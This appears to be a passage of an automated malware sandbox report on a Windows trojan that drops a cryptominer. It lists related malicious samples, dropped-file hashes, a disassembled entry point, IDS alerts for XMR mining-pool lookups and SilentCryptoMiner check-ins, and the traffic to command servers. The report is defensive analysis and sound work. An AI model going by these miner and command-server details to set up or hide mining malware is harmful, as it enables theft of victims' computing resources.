                                  h2UFp4aCRq.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                  • 141.94.96.144
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  DFNVereinzurFoerderungeinesDeutschenForschungsnetzesearm6.elfGet hashmaliciousUnknownBrowse
                                  • 140.181.82.54
                                  154.213.187.80-mips-2024-08-30T23_29_44.elfGet hashmaliciousMiraiBrowse
                                  • 134.30.131.221
                                  https://src-assistanceclient.com/robots.txtGet hashmaliciousUnknownBrowse
                                  • 141.95.85.198
                                  SecuriteInfo.com.Linux.Siggen.9999.28313.2324.elfGet hashmaliciousMiraiBrowse
                                  • 149.203.150.60
                                  sora.ppc.elfGet hashmaliciousUnknownBrowse
                                  • 139.174.148.142
                                  bViL3vNljZ.exeGet hashmaliciousUnknownBrowse
                                  • 84.246.85.36
                                  HsGTBFS78E.elfGet hashmaliciousSliverBrowse
                                  • 84.246.85.36
                                  bViL3vNljZ.exeGet hashmaliciousUnknownBrowse
                                  • 84.246.85.36
                                  https://files.fm/u/vtrxvgdh6wGet hashmaliciousGuLoaderBrowse
                                  • 141.95.33.120
                                  http://chengduyiwokeji-haiwai.datasink.datasjourney.comGet hashmaliciousUnknownBrowse
                                  • 141.95.33.120
                                  TSSCOM-ASRUgHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
                                  • 195.10.205.48
                                  kqS23MOytx.exeGet hashmaliciousSocks5Systemz, Stealc, Vidar, XWorm, XmrigBrowse
                                  • 195.10.205.48
                                  Z66MsXpleT.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                  • 195.10.205.48
                                  eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                  • 195.10.205.48
                                  iBO7gzlZr3.exeGet hashmaliciousLummaCBrowse
                                  • 195.10.205.48
                                  ORDERDATASHEET#PO8738763.scr.exeGet hashmaliciousAgentTesla, RedLine, SugarDump, XWormBrowse
                                  • 195.10.205.94
                                  RFQ 10046335 PO 4502042346 PR 11148099 411128.exeGet hashmaliciousRedLineBrowse
                                  • 195.10.205.102
                                  sWXyzk4Kv3.exeGet hashmaliciousAsyncRATBrowse
                                  • 195.10.205.90
                                  SecuriteInfo.com.Win32.TrojanX-gen.9663.10822.exeGet hashmaliciousXmrigBrowse
                                  • 195.10.205.162
                                  JCqU250N6g.exeGet hashmaliciousRedLineBrowse
                                  • 195.10.205.91
                                  No context
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Windows\Temp\clwjpwuuvdte.sysIf it doesn't work, run this.exeGet hashmaliciousXmrigBrowse
                                    04cde81ac938706771fa9fe936ee8f79fe7e079973098.exeGet hashmaliciousRedLine, XmrigBrowse
                                      2plugin27724.exeGet hashmaliciousXmrigBrowse
                                        SetLoader.exeGet hashmaliciousXmrigBrowse
                                          file.exeGet hashmaliciousXmrigBrowse
                                            22.08.2024.exeGet hashmaliciousXmrigBrowse
                                              3QKcKCEzYP.exeGet hashmaliciousLummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBCBrowse
                                                ExeFile (375).exeGet hashmaliciousXmrigBrowse
                                                  file.exeGet hashmaliciousXmrigBrowse
                                                    j0A1eprdwX.exeGet hashmaliciousUnknownBrowse
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2625536
                                                      Entropy (8bit):6.539341254453801
                                                      Encrypted:false
                                                      SSDEEP:49152:PJdHz87tVYYqWzvNTwSCnSZMUVIfzJ9KJnYtf9L+tnZGoxgeXui3dp:P/z8XYYqWLZwSYSZnV86JnYvL+VxrXus
                                                      MD5:6424419AC4C6F0A24C95233E527C1E8A
                                                      SHA1:DEAE1C236A839075F13C2F5F0A32FD123B0E0D4D
                                                      SHA-256:8C53149F0180A2D3D0C7B2B481C78D9DC0F88270C8506B5DD62EAF115A17E98D
                                                      SHA-512:2D9E37221158365F910A811F1D353D1CED3762B2F27BAAD61D67C1BB36E659BB6622120105E60630F31EE9E10A455E54021B67329B7D257B891A56CCCB58A748
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 76%
                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."......n....'.....@..........@.............................p(...........`.................................................h...<............0(..............`(.x...............................(.......8...............X............................text...fm.......n.................. ..`.rdata...............r..............@..@.data.....'......z'.................@....pdata.......0(.......(.............@..@.00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....reloc..x....`(.......(.............@..B................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1510207563435464
                                                      Encrypted:false
                                                      SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                      MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                      SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                      SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                      SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                      Malicious:false
                                                      Preview:@...e................................................@..........
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1510207563435464
                                                      Encrypted:false
                                                      SSDEEP:3:NlllulvX/Z:NllUvX
                                                      MD5:E55E6E0E1AB6A345A7BCC5FD9C39F70C
                                                      SHA1:E5344BE0ED383244752DD96C35183014062EB114
                                                      SHA-256:9635856D4CAE632D612BDD5736CEA8F6B6AEEBD6FE3AEB04A842FBDB386BCC91
                                                      SHA-512:74908F7F2D21452483A47A25A5728B9211215C6DB2591E94806E477B6B870C92BCE7E11D64A6E9B4AB225927869AD5440ED2995CCA42FD6C8612B027F994A2A5
                                                      Malicious:false
                                                      Preview:@...e................................................@..........
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\ProgramData\utblsmnncewd\bbecxurdegum.exe
                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):14544
                                                      Entropy (8bit):6.2660301556221185
                                                      Encrypted:false
                                                      SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                      MD5:0C0195C48B6B8582FA6F6373032118DA
                                                      SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                      SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                      SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                      Joe Sandbox View:
                                                      • Filename: If it doesn't work, run this.exe, Detection: malicious, Browse
                                                      • Filename: 04cde81ac938706771fa9fe936ee8f79fe7e079973098.exe, Detection: malicious, Browse
                                                      • Filename: 2plugin27724.exe, Detection: malicious, Browse
                                                      • Filename: SetLoader.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: 22.08.2024.exe, Detection: malicious, Browse
                                                      • Filename: 3QKcKCEzYP.exe, Detection: malicious, Browse
                                                      • Filename: ExeFile (375).exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: j0A1eprdwX.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Entropy (8bit):6.539341254453801
                                                      TrID:
                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                      • DOS Executable Generic (2002/1) 0.92%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe
                                                      File size:2'625'536 bytes
                                                      MD5:6424419ac4c6f0a24c95233e527c1e8a
                                                      SHA1:deae1c236a839075f13c2f5f0a32fd123b0e0d4d
                                                      SHA256:8c53149f0180a2d3d0c7b2b481c78d9dc0f88270c8506b5dd62eaf115a17e98d
                                                      SHA512:2d9e37221158365f910a811f1d353d1ced3762b2f27baad61d67c1bb36e659bb6622120105e60630f31ee9e10a455e54021b67329b7d257b891a56cccb58a748
                                                      SSDEEP:49152:PJdHz87tVYYqWzvNTwSCnSZMUVIfzJ9KJnYtf9L+tnZGoxgeXui3dp:P/z8XYYqWLZwSYSZnV86JnYvL+VxrXus
                                                      TLSH:A7C533F1D94AE2F7ED8900B99485EDB1A546BF702F7193DB54F385227D670D0E03A8A0
                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."......n....'.....@..........@.............................p(...........`........................................
                                                      Icon Hash:00928e8e8686b000
                                                      Entrypoint:0x140001140
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x140000000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x66C0FDAC [Sat Aug 17 19:44:44 2024 UTC]
                                                      TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                      CLR (.Net) Version:
                                                      OS Version Major:6
                                                      OS Version Minor:0
                                                      File Version Major:6
                                                      File Version Minor:0
                                                      Subsystem Version Major:6
                                                      Subsystem Version Minor:0
                                                      Import Hash:de41d4e0545d977de6ca665131bb479a
                                                      Instruction
                                                      dec eax
                                                      sub esp, 28h
                                                      dec eax
                                                      mov eax, dword ptr [00006ED5h]
                                                      mov dword ptr [eax], 00000001h
                                                      call 00007FE0E47F55BFh
                                                      nop
                                                      nop
                                                      nop
                                                      dec eax
                                                      add esp, 28h
                                                      ret
                                                      nop
                                                      inc ecx
                                                      push edi
                                                      inc ecx
                                                      push esi
                                                      push esi
                                                      push edi
                                                      push ebx
                                                      dec eax
                                                      sub esp, 20h
                                                      dec eax
                                                      mov eax, dword ptr [00000030h]
                                                      dec eax
                                                      mov edi, dword ptr [eax+08h]
                                                      dec eax
                                                      mov esi, dword ptr [00006EC9h]
                                                      xor eax, eax
                                                      dec eax
                                                      cmpxchg dword ptr [esi], edi
                                                      sete bl
                                                      je 00007FE0E47F55E0h
                                                      dec eax
                                                      cmp edi, eax
                                                      je 00007FE0E47F55DBh
                                                      dec esp
                                                      mov esi, dword ptr [00008599h]
                                                      nop word ptr [eax+eax+00000000h]
                                                      mov ecx, 000003E8h
                                                      inc ecx
                                                      call esi
                                                      xor eax, eax
                                                      dec eax
                                                      cmpxchg dword ptr [esi], edi
                                                      sete bl
                                                      je 00007FE0E47F55B7h
                                                      dec eax
                                                      cmp edi, eax
                                                      jne 00007FE0E47F5599h
                                                      dec eax
                                                      mov edi, dword ptr [00006E90h]
                                                      mov eax, dword ptr [edi]
                                                      cmp eax, 01h
                                                      jne 00007FE0E47F55BEh
                                                      mov ecx, 0000001Fh
                                                      call 00007FE0E47FBFC4h
                                                      jmp 00007FE0E47F55D9h
                                                      cmp dword ptr [edi], 00000000h
                                                      je 00007FE0E47F55BBh
                                                      mov byte ptr [002807C9h], 00000001h
                                                      jmp 00007FE0E47F55CBh
                                                      mov dword ptr [edi], 00000001h
                                                      dec eax
                                                      mov ecx, dword ptr [00006E7Ah]
                                                      dec eax
                                                      mov edx, dword ptr [00006E7Bh]
                                                      call 00007FE0E47FBFBBh
                                                      mov eax, dword ptr [edi]
                                                      cmp eax, 01h
                                                      jne 00007FE0E47F55CBh
                                                      dec eax
                                                      mov ecx, dword ptr [00006E50h]
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x94680x3c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2830000x180.pdata
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2860000x78.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x80a00x28.rdata
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x84100x138.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x96000x158.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x6d660x6e00ee34e2442973a8674fcaf5c9f0376098False0.5241477272727273data6.198368138669057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x80000x1bb00x1c009ff43f62a58c1cb23a2aa005cace94f6False0.45912388392857145data4.764753869731783IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xa0000x2787e00x277a00b6d49ffce16718a6e4483dc9ea48004dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .pdata0x2830000x1800x200fdd46b00dd22a7c50e70b33864aa34abFalse0.505859375data3.1278253668305642IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .00cfg0x2840000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .tls0x2850000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .reloc0x2860000x780x2004c623b7f14fb60ba5fc5786c5bdae517False0.228515625data1.4113404372261673IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      DLLImport
                                                      msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
                                                      KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-09-05T16:25:01.830482+02002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.549704141.94.96.718080TCP
                                                      2024-09-05T16:25:06.413438+02002047928ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com)2192.168.2.5610151.1.1.153UDP
                                                      2024-09-05T16:25:08.184137+02002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.549705195.10.205.25380TCP
                                                      2024-09-05T16:26:07.213120+02002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.549715195.10.205.25380TCP
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Sep 5, 2024 16:25:06.424220085 CEST497048080192.168.2.5141.94.96.71
                                                      Sep 5, 2024 16:25:06.429707050 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:25:06.432745934 CEST497048080192.168.2.5141.94.96.71
                                                      Sep 5, 2024 16:25:06.432851076 CEST497048080192.168.2.5141.94.96.71
                                                      Sep 5, 2024 16:25:06.437668085 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:25:07.050215006 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:25:07.096066952 CEST497048080192.168.2.5141.94.96.71
                                                      Sep 5, 2024 16:25:07.517781973 CEST4970580192.168.2.5195.10.205.253
                                                      Sep 5, 2024 16:25:07.524490118 CEST8049705195.10.205.253192.168.2.5
                                                      Sep 5, 2024 16:25:07.524750948 CEST4970580192.168.2.5195.10.205.253
                                                      Sep 5, 2024 16:25:07.524826050 CEST4970580192.168.2.5195.10.205.253
                                                      Sep 5, 2024 16:25:07.529582977 CEST8049705195.10.205.253192.168.2.5
                                                      Sep 5, 2024 16:25:07.530529022 CEST4970580192.168.2.5195.10.205.253
                                                      Sep 5, 2024 16:25:07.535442114 CEST8049705195.10.205.253192.168.2.5
                                                      Sep 5, 2024 16:25:08.180952072 CEST8049705195.10.205.253192.168.2.5
                                                      Sep 5, 2024 16:25:08.184010983 CEST8049705195.10.205.253192.168.2.5
                                                      Sep 5, 2024 16:25:08.184137106 CEST4970580192.168.2.5195.10.205.253
                                                      Sep 5, 2024 16:25:08.184267998 CEST4970580192.168.2.5195.10.205.253
                                                      Sep 5, 2024 16:25:08.189018965 CEST8049705195.10.205.253192.168.2.5
                                                      Sep 5, 2024 16:25:19.619952917 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:25:19.620150089 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:25:19.620199919 CEST497048080192.168.2.5141.94.96.71
                                                      Sep 5, 2024 16:25:19.620398998 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:25:19.620438099 CEST497048080192.168.2.5141.94.96.71
                                                      Sep 5, 2024 16:25:19.621001959 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:25:19.621042967 CEST497048080192.168.2.5141.94.96.71
                                                      Sep 5, 2024 16:25:33.077090979 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:25:33.127327919 CEST497048080192.168.2.5141.94.96.71
                                                      Sep 5, 2024 16:25:43.101370096 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:25:43.158787012 CEST497048080192.168.2.5141.94.96.71
                                                      Sep 5, 2024 16:25:47.546423912 CEST497048080192.168.2.5141.94.96.71
                                                      Sep 5, 2024 16:25:47.551358938 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:25:47.746654034 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:25:47.799213886 CEST497048080192.168.2.5141.94.96.71
                                                      Sep 5, 2024 16:25:53.534440994 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:25:53.534629107 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:25:53.534674883 CEST497048080192.168.2.5141.94.96.71
                                                      Sep 5, 2024 16:26:04.801320076 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:26:04.846072912 CEST497048080192.168.2.5141.94.96.71
                                                      Sep 5, 2024 16:26:06.436137915 CEST4971580192.168.2.5195.10.205.253
                                                      Sep 5, 2024 16:26:06.441065073 CEST8049715195.10.205.253192.168.2.5
                                                      Sep 5, 2024 16:26:06.441157103 CEST4971580192.168.2.5195.10.205.253
                                                      Sep 5, 2024 16:26:06.441839933 CEST4971580192.168.2.5195.10.205.253
                                                      Sep 5, 2024 16:26:06.446563005 CEST8049715195.10.205.253192.168.2.5
                                                      Sep 5, 2024 16:26:06.446628094 CEST4971580192.168.2.5195.10.205.253
                                                      Sep 5, 2024 16:26:06.451473951 CEST8049715195.10.205.253192.168.2.5
                                                      Sep 5, 2024 16:26:07.212920904 CEST8049715195.10.205.253192.168.2.5
                                                      Sep 5, 2024 16:26:07.213109970 CEST8049715195.10.205.253192.168.2.5
                                                      Sep 5, 2024 16:26:07.213119984 CEST4971580192.168.2.5195.10.205.253
                                                      Sep 5, 2024 16:26:07.213151932 CEST4971580192.168.2.5195.10.205.253
                                                      Sep 5, 2024 16:26:07.217899084 CEST8049715195.10.205.253192.168.2.5
                                                      Sep 5, 2024 16:26:14.862273932 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:26:14.908581018 CEST497048080192.168.2.5141.94.96.71
                                                      Sep 5, 2024 16:26:24.987126112 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:26:25.033576012 CEST497048080192.168.2.5141.94.96.71
                                                      Sep 5, 2024 16:26:41.284357071 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:26:41.346060038 CEST497048080192.168.2.5141.94.96.71
                                                      Sep 5, 2024 16:26:47.721940041 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:26:47.767942905 CEST497048080192.168.2.5141.94.96.71
                                                      Sep 5, 2024 16:26:51.973241091 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:26:51.973448992 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:26:51.973661900 CEST497048080192.168.2.5141.94.96.71
                                                      Sep 5, 2024 16:26:51.973843098 CEST808049704141.94.96.71192.168.2.5
                                                      Sep 5, 2024 16:26:51.973893881 CEST497048080192.168.2.5141.94.96.71
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Sep 5, 2024 16:25:06.413438082 CEST6101553192.168.2.51.1.1.1
                                                      Sep 5, 2024 16:25:06.421236038 CEST53610151.1.1.1192.168.2.5
